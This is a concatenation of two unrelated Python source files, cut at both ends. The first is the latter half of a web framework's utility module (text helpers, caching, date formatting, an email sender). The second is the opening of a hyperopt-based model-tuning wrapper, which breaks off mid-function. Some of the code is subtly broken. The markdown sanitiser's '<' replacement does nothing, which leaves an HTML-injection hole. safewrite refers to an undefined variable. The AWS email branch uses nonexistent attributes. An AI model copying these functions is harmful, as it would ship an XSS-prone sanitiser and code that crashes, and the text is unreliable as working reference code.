pass
class _hack(tuple): pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""
removes the string `remove` from the right of `text`
>>> rstrips("foobar", "bar")
'foo'
"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""
removes the string `remove` from the left of `text`
>>> lstrips("foobar", "foo")
'bar'
"""
return _strips('l', text, remove)
def strips(text, remove):
"""
removes the string `remove` from the both sides of `text`
>>> strips("foobarfoo", "foo")
'bar'
"""
return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
t = type(obj)
if t is unicode:
return obj
elif t is str:
return obj.decode(encoding)
elif t in [int, float, bool]:
return unicode(obj)
elif hasattr(obj, '__unicode__') or isinstance(obj, unicode):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode(encoding)
elif isinstance(obj, str):
return obj
elif hasattr(obj, 'next') and hasattr(obj, '__iter__'): # iterator
return itertools.imap(safestr, obj)
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class TimeoutError(Exception): pass
def timelimit(timeout):
"""
A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
if it takes longer.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>>
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> timelimit(1)(meaningoflife)()
42
_Caveat:_ The function isn't stopped after `timeout` seconds but continues
executing in a separate thread. (There seems to be no way to kill a thread.)
inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
"""
def _1(function):
def _2(*args, **kw):
class Dispatch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
self.error = None
self.setDaemon(True)
self.start()
def run(self):
try:
self.result = function(*args, **kw)
except:
self.error = sys.exc_info()
c = Dispatch()
c.join(timeout)
if c.isAlive():
raise TimeoutError, 'took too long'
if c.error:
raise c.error[0], c.error[1]
return c.result
return _2
return _1
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
If `expires` is specified, values are recalculated after `expires` seconds.
If `background` is specified, values are recalculated in a separate thread.
>>> calls = 0
>>> def howmanytimeshaveibeencalled():
... global calls
... calls += 1
... return calls
>>> fastcalls = memoize(howmanytimeshaveibeencalled)
>>> howmanytimeshaveibeencalled()
1
>>> howmanytimeshaveibeencalled()
2
>>> fastcalls()
3
>>> fastcalls()
3
>>> import time
>>> fastcalls = memoize(howmanytimeshaveibeencalled, .1, background=False)
>>> fastcalls()
4
>>> fastcalls()
4
>>> time.sleep(.2)
>>> fastcalls()
5
>>> def slowfunc():
... time.sleep(.1)
... return howmanytimeshaveibeencalled()
>>> fastcalls = memoize(slowfunc, .2, background=True)
>>> fastcalls()
6
>>> timelimit(.05)(fastcalls)()
6
>>> time.sleep(.2)
>>> timelimit(.05)(fastcalls)()
6
>>> timelimit(.05)(fastcalls)()
6
>>> time.sleep(.2)
>>> timelimit(.05)(fastcalls)()
7
>>> fastcalls = memoize(slowfunc, None, background=True)
>>> threading.Thread(target=fastcalls).start()
>>> time.sleep(.01)
>>> fastcalls()
9
"""
def __init__(self, func, expires=None, background=True):
self.func = func
self.cache = {}
self.expires = expires
self.background = background
self.running = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if not self.running.get(key):
self.running[key] = threading.Lock()
def update(block=False):
if self.running[key].acquire(block):
try:
self.cache[key] = (self.func(*args, **keywords), time.time())
finally:
self.running[key].release()
if key not in self.cache:
update(block=True)
elif self.expires and (time.time() - self.cache[key][1]) > self.expires:
if self.background:
threading.Thread(target=update).start()
else:
update()
return self.cache[key][0]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""
Like re.sub, but returns the replacement _and_ the match object.
>>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
>>> t
'foooooolish'
>>> m.groups()
('oooooo',)
"""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
>>> list(group([1,2,3,4,5], 2))
[[1, 2], [3, 4], [5]]
"""
def take(seq, n):
for i in xrange(n):
yield seq.next()
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
x = list(take(seq, size))
if x:
yield x
else:
break
def uniq(seq, key=None):
"""
Removes duplicate elements from a list while preserving the order of the rest.
>>> uniq([9,0,2,1,0])
[9, 0, 2, 1]
The value of the optional `key` parameter should be a function that
takes a single argument and returns a key to test the uniqueness.
>>> uniq(["Foo", "foo", "bar"], key=lambda s: s.lower())
['Foo', 'bar']
"""
key = key or (lambda x: x)
seen = set()
result = []
for v in seq:
k = key(v)
if k in seen:
continue
seen.add(k)
result.append(v)
return result
def iterview(x):
"""
Takes an iterable `x` and returns an iterator over it
which prints its progress to stderr as it iterates through.
"""
WIDTH = 70
def plainformat(n, lenx):
return '%5.1f%% (%*d/%d)' % ((float(n)/lenx)*100, len(str(lenx)), n, lenx)
def bars(size, n, lenx):
val = int((float(n)*size)/lenx + 0.5)
if size - val:
spacing = ">" + (" "*(size-val))[1:]
else:
spacing = ""
return "[%s%s]" % ("="*val, spacing)
def eta(elapsed, n, lenx):
if n == 0:
return '--:--:--'
if n == lenx:
secs = int(elapsed)
else:
secs = int((elapsed/n) * (lenx-n))
mins, secs = divmod(secs, 60)
hrs, mins = divmod(mins, 60)
return '%02d:%02d:%02d' % (hrs, mins, secs)
def format(starttime, n, lenx):
out = plainformat(n, lenx) + ' '
if n == lenx:
end = ' '
else:
end = ' ETA '
end += eta(time.time() - starttime, n, lenx)
out += bars(WIDTH - len(out) - len(end), n, lenx)
out += end
return out
starttime = time.time()
lenx = len(x)
for n, y in enumerate(x):
sys.stderr.write('\r' + format(starttime, n, lenx))
yield y
sys.stderr.write('\r' + format(starttime, n+1, lenx) + '\n')
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
For boolean test, IterBetter peeps at first value in the itertor without effecting the iteration.
>>> c = iterbetter(iter(range(5)))
>>> bool(c)
True
>>> list(c)
[0, 1, 2, 3, 4]
>>> c = iterbetter(iter([]))
>>> bool(c)
False
>>> list(c)
[]
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
if hasattr(self, "_head"):
yield self._head
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
def __nonzero__(self):
if hasattr(self, "__len__"):
return len(self) != 0
elif hasattr(self, "_head"):
return True
else:
try:
self._head = self.i.next()
except StopIteration:
return False
else:
return True
iterbetter = IterBetter
def safeiter(it, cleanup=None, ignore_errors=True):
"""Makes an iterator safe by ignoring the exceptions occured during the iteration.
"""
def next():
while True:
try:
return it.next()
except StopIteration:
raise
except:
traceback.print_exc()
it = iter(it)
while True:
yield next()
def safewrite(filename, content):
"""Writes the content to a temp file and then moves the temp file to
given filename to avoid overwriting the existing file in case of errors.
"""
f = file(filename + '.tmp', 'w')
f.write(content)
f.close()
os.rename(f.name, path)
def dictreverse(mapping):
"""
Returns a new dictionary with keys and values swapped.
>>> dictreverse({1: 2, 3: 4})
{2: 1, 4: 3}
"""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
>>> d = {1:2, 3:4}
>>> dictfind(d, 4)
3
>>> dictfind(d, 5)
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
>>> d = {1:4, 3:4}
>>> dictfindall(d, 4)
[1, 3]
>>> dictfindall(d, 5)
[]
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
>>> d = {1:2, 3:4}
>>> dictincr(d, 1)
3
>>> d[1]
3
>>> dictincr(d, 5)
1
>>> d[5]
1
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(*dicts):
"""
Returns a dictionary consisting of the keys in the argument dictionaries.
If they share a key, the value from the last argument is used.
>>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
{1: 0, 2: 1, 3: 1}
"""
result = {}
for dct in dicts:
result.update(dct)
return result
def requeue(queue, index=-1):
"""Returns the element at index after moving it to the beginning of the queue.
>>> x = [1, 2, 3, 4]
>>> requeue(x)
4
>>> x
[4, 1, 2, 3]
"""
x = queue.pop(index)
queue.insert(0, x)
return x
def restack(stack, index=0):
"""Returns the element at index after moving it to the top of stack.
>>> x = [1, 2, 3, 4]
>>> restack(x)
1
>>> x
[2, 3, 4, 1]
"""
x = stack.pop(index)
stack.append(x)
return x
def listget(lst, ind, default=None):
"""
Returns `lst[ind]` if it exists, `default` otherwise.
>>> listget(['a'], 0)
'a'
>>> listget(['a'], 1)
>>> listget(['a'], 1, 'b')
'b'
"""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""
Returns `integer` as an int or `default` if it can't.
>>> intget('3')
3
>>> intget('3a')
>>> intget('3a', 0)
0
"""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""
Converts a (UTC) datetime object to a nice string representation.
>>> from datetime import datetime, timedelta
>>> d = datetime(1970, 5, 1)
>>> datestr(d, now=d)
'0 microseconds ago'
>>> for t, v in {
... timedelta(microseconds=1): '1 microsecond ago',
... timedelta(microseconds=2): '2 microseconds ago',
... -timedelta(microseconds=1): '1 microsecond from now',
... -timedelta(microseconds=2): '2 microseconds from now',
... timedelta(microseconds=2000): '2 milliseconds ago',
... timedelta(seconds=2): '2 seconds ago',
... timedelta(seconds=2*60): '2 minutes ago',
... timedelta(seconds=2*60*60): '2 hours ago',
... timedelta(days=2): '2 days ago',
... }.iteritems():
... assert datestr(d, now=d+t) == v
>>> datestr(datetime(1970, 1, 1), now=d)
'January 1'
>>> datestr(datetime(1969, 1, 1), now=d)
'January 1, 1969'
>>> datestr(datetime(1970, 6, 1), now=d)
'June 1, 1970'
>>> datestr(None)
''
"""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not then: return ""
if not now: now = datetime.datetime.utcnow()
if type(now).__name__ == "DateTime":
now = datetime.datetime.fromtimestamp(now)
if type(then).__name__ == "DateTime":
then = datetime.datetime.fromtimestamp(then)
elif type(then).__name__ == "date":
then = datetime.datetime(then.year, then.month, then.day)
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def numify(string):
"""
Removes all non-digit characters from `string`.
>>> numify('800-555-1212')
'8005551212'
>>> numify('800.555.1212')
'8005551212'
"""
return ''.join([c for c in str(string) if c.isdigit()])
def denumify(string, pattern):
"""
Formats `string` according to `pattern`, where the letter X gets replaced
by characters from `string`.
>>> denumify("8005551212", "(XXX) XXX-XXXX")
'(800) 555-1212'
"""
out = []
for c in pattern:
if c == "X":
out.append(string[0])
string = string[1:]
else:
out.append(c)
return ''.join(out)
def commify(n):
"""
Add commas to an integer `n`.
>>> commify(1)
'1'
>>> commify(123)
'123'
>>> commify(1234)
'1,234'
>>> commify(1234567890)
'1,234,567,890'
>>> commify(123.0)
'123.0'
>>> commify(1234.5)
'1,234.5'
>>> commify(1234.56789)
'1,234.56789'
>>> commify('%.2f' % 1234.5)
'1,234.50'
>>> commify(None)
>>>
"""
if n is None: return None
n = str(n)
if '.' in n:
dollars, cents = n.split('.')
else:
dollars, cents = n, None
r = []
for i, c in enumerate(str(dollars)[::-1]):
if i and (not (i % 3)):
r.insert(0, ',')
r.insert(0, c)
out = ''.join(r)
if cents:
out += '.' + cents
return out
def dateify(datestring):
"""
Formats a numified `datestring` properly.
"""
return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
"""
Formats an ordinal.
Doesn't handle negative numbers.
>>> nthstr(1)
'1st'
>>> nthstr(0)
'0th'
>>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
>>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
>>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
['111th', '112th', '113th', '114th', '115th']
"""
assert n >= 0
if n % 100 in [11, 12, 13]: return '%sth' % n
return {1: '%sst', 2: '%snd', 3: '%srd'}.get(n % 10, '%sth') % n
def cond(predicate, consequence, alternative=None):
"""
Function replacement for if-else to use in expressions.
>>> x = 2
>>> cond(x % 2 == 0, "even", "odd")
'even'
>>> cond(x % 2 == 0, "even", "odd") + '_row'
'even_row'
"""
if predicate:
return consequence
else:
return alternative
class CaptureStdout:
"""
Captures everything `func` prints to stdout and returns it instead.
>>> def idiot():
... print "foo"
>>> capturestdout(idiot)()
'foo\\n'
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
>>> import time
>>> out, inf = profile(time.sleep)(.001)
>>> out
>>> inf[:10].strip()
'took 0.0'
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, os, tempfile ##, time already imported
f, filename = tempfile.mkstemp()
os.close(f)
prof = hotshot.Profile(filename)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
import cStringIO
out = cStringIO.StringIO()
stats = hotshot.stats.load(filename)
stats.stream = out
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(40)
stats.print_callers()
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += out.getvalue()
# remove the tempfile
try:
os.remove(filename)
except IOError:
pass
return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
>>> tryall(dict(j=lambda: True))
j: True
----------------------------------------
results:
True: 1
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict(threadlocal):
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
...
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
_instances = set()
def __init__(self):
ThreadedDict._instances.add(self)
def __del__(self):
ThreadedDict._instances.remove(self)
def __hash__(self):
return id(self)
def clear_all():
"""Clears all ThreadedDict instances.
"""
for t in ThreadedDict._instances:
t.clear()
clear_all = staticmethod(clear_all)
# Define all these methods to more or less fully emulate dict -- attribute access
# is built into threading.local.
def __getitem__(self, key):
return self.__dict__[key]
def __setitem__(self, key, value):
self.__dict__[key] = value
def __delitem__(self, key):
del self.__dict__[key]
def __contains__(self, key):
return key in self.__dict__
has_key = __contains__
def clear(self):
self.__dict__.clear()
def copy(self):
return self.__dict__.copy()
def get(self, key, default=None):
return self.__dict__.get(key, default)
def items(self):
return self.__dict__.items()
def iteritems(self):
return self.__dict__.iteritems()
def keys(self):
return self.__dict__.keys()
def iterkeys(self):
return self.__dict__.iterkeys()
iter = iterkeys
def values(self):
return self.__dict__.values()
def itervalues(self):
return self.__dict__.itervalues()
def pop(self, key, *args):
return self.__dict__.pop(key, *args)
def popitem(self):
return self.__dict__.popitem()
def setdefault(self, key, default=None):
return self.__dict__.setdefault(key, default)
def update(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def __repr__(self):
return '<ThreadedDict %r>' % self.__dict__
__str__ = __repr__
threadeddict = ThreadedDict
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
>>> self = storage()
>>> autoassign(self, dict(a=1, b=2))
>>> self
<Storage {'a': 1, 'b': 2}>
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
def to36(q):
"""
Converts an integer to base 36 (a useful scheme for human-sayable IDs).
>>> to36(35)
'z'
>>> to36(119292)
'2k1o'
>>> int(to36(939387374), 36)
939387374
>>> to36(0)
'0'
>>> to36(-393)
Traceback (most recent call last):
...
ValueError: must supply a positive integer
"""
if q < 0: raise ValueError, "must supply a positive integer"
letters = "0123456789abcdefghijklmnopqrstuvwxyz"
converted = []
while q != 0:
q, r = divmod(q, 36)
converted.insert(0, letters[r])
return "".join(converted) or '0'
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
from markdown import markdown
if text:
text = text.replace('<', '<')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
"""
Sends the email message `message` with mail and envelope headers
for from `from_address_` to `to_address` with `subject`.
Additional email headers can be specified with the dictionary
`headers.
Optionally cc, bcc and attachments can be specified as keyword arguments.
Attachments must be an iterable and each attachment can be either a
filename or a file object or a dictionary with filename, content and
optionally content_type keys.
If `web.config.smtp_server` is set, it will send the message
to that SMTP server. Otherwise it will look for
`/usr/sbin/sendmail`, the typical location for the sendmail-style
binary. To use sendmail from a different path, set `web.config.sendmail_path`.
"""
attachments = kw.pop("attachments", [])
mail = _EmailMessage(from_address, to_address, subject, message, headers, **kw)
for a in attachments:
if isinstance(a, dict):
mail.attach(a['filename'], a['content'], a.get('content_type'))
elif hasattr(a, 'read'): # file
filename = os.path.basename(getattr(a, "name", ""))
content_type = getattr(a, 'content_type', None)
mail.attach(filename, a.read(), content_type)
elif isinstance(a, basestring):
f = open(a, 'rb')
content = f.read()
f.close()
filename = os.path.basename(a)
mail.attach(filename, content, None)
else:
raise ValueError, "Invalid attachment: %s" % repr(a)
mail.send()
class _EmailMessage:
def __init__(self, from_address, to_address, subject, message, headers=None, **kw):
def listify(x):
if not isinstance(x, list):
return [safestr(x)]
else:
return [safestr(a) for a in x]
subject = safestr(subject)
message = safestr(message)
from_address = safestr(from_address)
to_address = listify(to_address)
cc = listify(kw.get('cc', []))
bcc = listify(kw.get('bcc', []))
recipients = to_address + cc + bcc
import email.Utils
self.from_address = email.Utils.parseaddr(from_address)[1]
self.recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
self.headers = dictadd({
'From': from_address,
'To': ", ".join(to_address),
'Subject': subject
}, headers or {})
if cc:
self.headers['Cc'] = ", ".join(cc)
self.message = self.new_message()
self.message.add_header("Content-Transfer-Encoding", "7bit")
self.message.add_header("Content-Disposition", "inline")
self.message.add_header("MIME-Version", "1.0")
self.message.set_payload(message, 'utf-8')
self.multipart = False
def new_message(self):
from email.Message import Message
return Message()
def attach(self, filename, content, content_type=None):
if not self.multipart:
msg = self.new_message()
msg.add_header("Content-Type", "multipart/mixed")
msg.attach(self.message)
self.message = msg
self.multipart = True
import mimetypes
try:
from email import encoders
except:
from email import Encoders as encoders
content_type = content_type or mimetypes.guess_type(filename)[0] or "applcation/octet-stream"
msg = self.new_message()
msg.set_payload(content)
msg.add_header('Content-Type', content_type)
msg.add_header('Content-Disposition', 'attachment', filename=filename)
if not content_type.startswith("text/"):
encoders.encode_base64(msg)
self.message.attach(msg)
def prepare_message(self):
for k, v in self.headers.iteritems():
if k.lower() == "content-type":
self.message.set_type(v)
else:
self.message.add_header(k, v)
self.headers = {}
def send(self):
try:
import webapi
except ImportError:
webapi = Storage(config=Storage())
self.prepare_message()
message_text = self.message.as_string()
if webapi.config.get('smtp_server'):
server = webapi.config.get('smtp_server')
port = webapi.config.get('smtp_port', 0)
username = webapi.config.get('smtp_username')
password = webapi.config.get('smtp_password')
debug_level = webapi.config.get('smtp_debuglevel', None)
starttls = webapi.config.get('smtp_starttls', False)
import smtplib
smtpserver = smtplib.SMTP(server, port)
if debug_level:
smtpserver.set_debuglevel(debug_level)
if starttls:
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if username and password:
smtpserver.login(username, password)
smtpserver.sendmail(self.from_address, self.recipients, message_text)
smtpserver.quit()
elif webapi.config.get('email_engine') == 'aws':
import boto.ses
c = boto.ses.SESConnection(
aws_access_key_id=webapi.config.get('aws_access_key_id'),
aws_secret_access_key=web.api.config.get('aws_secret_access_key'))
c.send_raw_email(self.from_address, message_text, self.from_recipients)
else:
sendmail = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
assert not self.from_address.startswith('-'), 'security'
for r in self.recipients:
assert not r.startswith('-'), 'security'
cmd = [sendmail, '-f', self.from_address] + self.recipients
if subprocess:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE)
p.stdin.write(message_text)
p.stdin.close()
p.wait()
else:
i, o = os.popen2(cmd)
i.write(message)
i.close()
o.close()
del i, o
def __repr__(self):
return "<EmailMessage>"
def __str__(self):
return self.message.as_string()
if __name__ == "__main__":
import doctest
doctest.testmod()
|
hyperopt.py
|
# Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import sys
import time
import traceback
import warnings
from typing import Any, Dict, Optional
import hyperopt
import numpy as np
import pandas as pd
from hyperopt.exceptions import AllTrialsFailed
from sklearn.metrics import check_scoring, log_loss
from sklearn.model_selection import train_test_split
from sklearn.model_selection._split import check_cv
import lale.docstrings
import lale.helpers
import lale.operators
from lale.helpers import (
create_instance_from_hyperopt_search_space,
cross_val_score_track_trials,
)
from lale.lib.sklearn import LogisticRegression
from lale.search.op2hp import hyperopt_search_space
from lale.search.PGO import PGO
SEED = 42
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
class _HyperoptImpl:
def __init__(
self,
estimator=None,
max_evals=50,
frac_evals_with_defaults=0,
algo="tpe",
cv=5,
handle_cv_failure=False,
scoring=None,
best_score=0.0,
max_opt_time=None,
max_eval_time=None,
pgo: Optional[PGO] = None,
show_progressbar=True,
args_to_scorer=None,
verbose=False,
):
self.max_evals = max_evals
if estimator is None:
self.estimator = LogisticRegression()
else:
self.estimator = estimator
if frac_evals_with_defaults > 0:
self.evals_with_defaults = int(frac_evals_with_defaults * max_evals)
else:
self.evals_with_defaults = 0
self.algo = algo
self.scoring = scoring
if self.scoring is None:
is_clf = self.estimator.is_classifier()
if is_clf:
self.scoring = "accuracy"
else:
self.scoring = "r2"
self.best_score = best_score
self.handle_cv_failure = handle_cv_failure
self.cv = cv
self._trials = hyperopt.Trials()
self._default_trials = hyperopt.Trials()
self.max_opt_time = max_opt_time
self.max_eval_time = max_eval_time
self.pgo = pgo
self.show_progressbar = show_progressbar
if args_to_scorer is not None:
self.args_to_scorer = args_to_scorer
else:
self.args_to_scorer = {}
self.verbose = verbose
def _summarize_statuses(self):
status_list = self._trials.statuses()
status_hist = {}
for status in status_list:
status_hist[status] = 1 + status_hist.get(status, 0)
if hyperopt.STATUS_FAIL in status_hist:
print(
f"{status_hist[hyperopt.STATUS_FAIL]} out of {len(status_list)} trials failed, call summary() for details."
)
if not self.verbose:
print("Run with verbose=True to see per-trial exceptions.")
def fit(self, X_train, y_train):
opt_start_time = time.time()
is_clf = self.estimator.is_classifier()
self.cv = check_cv(self.cv, y=y_train, classifier=is_clf)
data_schema = lale.helpers.fold_schema(X_train, y_train, self.cv, is_clf)
self.search_space = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator, pgo=self.pgo, data_schema=data_schema
)
],
)
# Create a search space with default hyperparameters for all trainable parts of the pipeline.
# This search space is used for `frac_evals_with_defaults` fraction of the total trials.
try:
self.search_space_with_defaults = hyperopt.hp.choice(
"meta_model",
[
hyperopt_search_space(
self.estimator.freeze_trainable(),
pgo=self.pgo,
data_schema=data_schema,
)
],
)
except Exception:
logger.warning(
"Exception caught during generation of default search space, setting frac_evals_with_defaults to zero."
)
self.evals_with_defaults = 0
def hyperopt_train_test(params, X_train, y_train):
warnings.filterwarnings("ignore")
trainable = create_instance_from_hyperopt_search_space(
self.estimator, params
)
try:
cv_score, logloss, execution_time = cross_val_score_track_trials(
trainable,
X_train,
y_train,
cv=self.cv,
scoring=self.scoring,
args_to_scorer=self.args_to_scorer,
)
logger.debug(
"Successful trial of hyperopt with hyperparameters:{}".format(
params
)
)
except BaseException as e:
# If there is any error in cross validation, use the score based on a random train-test split as the evaluation criterion
if self.handle_cv_failure:
(
X_train_part,
X_validation,
y_train_part,
y_validation,
) = train_test_split(X_train, y_train, test_size=0.20)
start = time.time()
trained = trainable.fit(X_train_part, y_train_part)
scorer = check_scoring(trainable, scoring=self.scoring)
cv_score = scorer(
trained, X_validation, y_validation, **self.args_to_scorer
)
execution_time = time.time() - start
y_pred_proba = trained.predict_proba(X_validation)
try:
logloss = log_loss(y_true=y_validation, y_pred=y_pred_proba)
except BaseException:
logloss = 0
logger.debug("Warning, log loss cannot be computed")
else:
logger.debug(e)
logger.debug(
"Error {} with pipeline:{}".format(e, trainable.to_json())
)
raise e
return cv_score, logloss, execution_time
def merge_trials(trials1, trials2):
max_tid = max([trial["tid"] for trial in trials1.trials])
for trial in trials2:
tid = trial["tid"] + max_tid + 1
hyperopt_trial = hyperopt.Trials().new_trial_docs(
tids=[None], specs=[None], results=[None], miscs=[None]
)
hyperopt_trial[0] = trial
hyperopt_trial[0]["tid"] = tid
hyperopt_trial[0]["misc"]["tid"] = tid
for key in hyperopt_trial[0]["misc"]["idxs"].keys():
hyperopt_trial[0]["misc"]["idxs"][key] = [tid]
trials1.insert_trial_docs(hyperopt_trial)
trials1.refresh()
return trials1
def proc_train_test(params, X_train, y_train, return_dict):
return_dict["params"] = copy.deepcopy(params)
try:
score, logloss, execution_time = hyperopt_train_test(
params, X_train=X_train, y_train=y_train
)
return_dict["loss"] = self.best_score - score
return_dict["time"] = execution_time
return_dict["log_loss"] = logloss
return_dict["status"] = hyperopt.STATUS_OK
except BaseException as e:
exception_type = f"{type(e).__module__}.{type(e).__name__}"
try:
